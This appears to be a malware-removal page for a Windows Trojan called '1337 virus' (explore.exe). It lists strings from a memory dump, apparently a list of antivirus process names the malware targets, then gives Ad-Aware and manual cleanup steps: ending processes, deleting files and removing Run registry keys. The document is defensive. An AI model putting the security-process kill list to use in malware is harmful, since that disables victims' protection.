AVPTC32.EXE
AVPM.EXE
AVPDOS32.EXE
AVPCC.EXE
AVP32.EXE
AVP.EXE
AVNT.EXE
AVLTMAIN.EXE
AVKWCTl9.EXE
AVKSERVICE.EXE
AVKSERV.EXE
AVKPOP.EXE
AVGW.EXE
AVGUARD.EXE
AVGSERV9.EXE
AVGSERV.EXE
AVGNT.EXE
AVGCTRL.EXE
AVGCC32.EXE
AVE32.EXE
AVCONSOL.EXE
AUTOUPDATE.EXE
AUTOTRACE.EXE
AUTODOWN.EXE
AUPDATE.EXE
AU.EXE
ATWATCH.EXE
ATUPDATER.EXE
ATRO55EN.EXE
ATGUARD.EXE
ATCON.EXE
ARR.EXE
APVXDWIN.EXE
APLICA32.EXE
APIMONITOR.EXE
ANTS.EXE
ANTIVIRUS.EXE
ANTI-TROJAN.EXE
AMON9X.EXE
ALOGSERV.EXE
ALEVIR.EXE
ALERTSVC.EXE
AGENTW.EXE
AGENTSVR.EXE
ADVXDWIN.EXE
ADAWARE.EXE
ACKWIN32.EXE

explore.exe_464_rwx_00851000_0001B000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    explore.exe:1452
    %original file name%.exe:1808
    regedit.exe:640

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\a.bat (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\5UP6LBPK\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PX0R9ZUJ\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S8PZTGPI\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\JB2UPCO0\desktop.ini (67 bytes)
    %System%\explore.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\explore.exe (2712 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
    "1337 virus" = "explore.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "1337 virus" = "explore.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
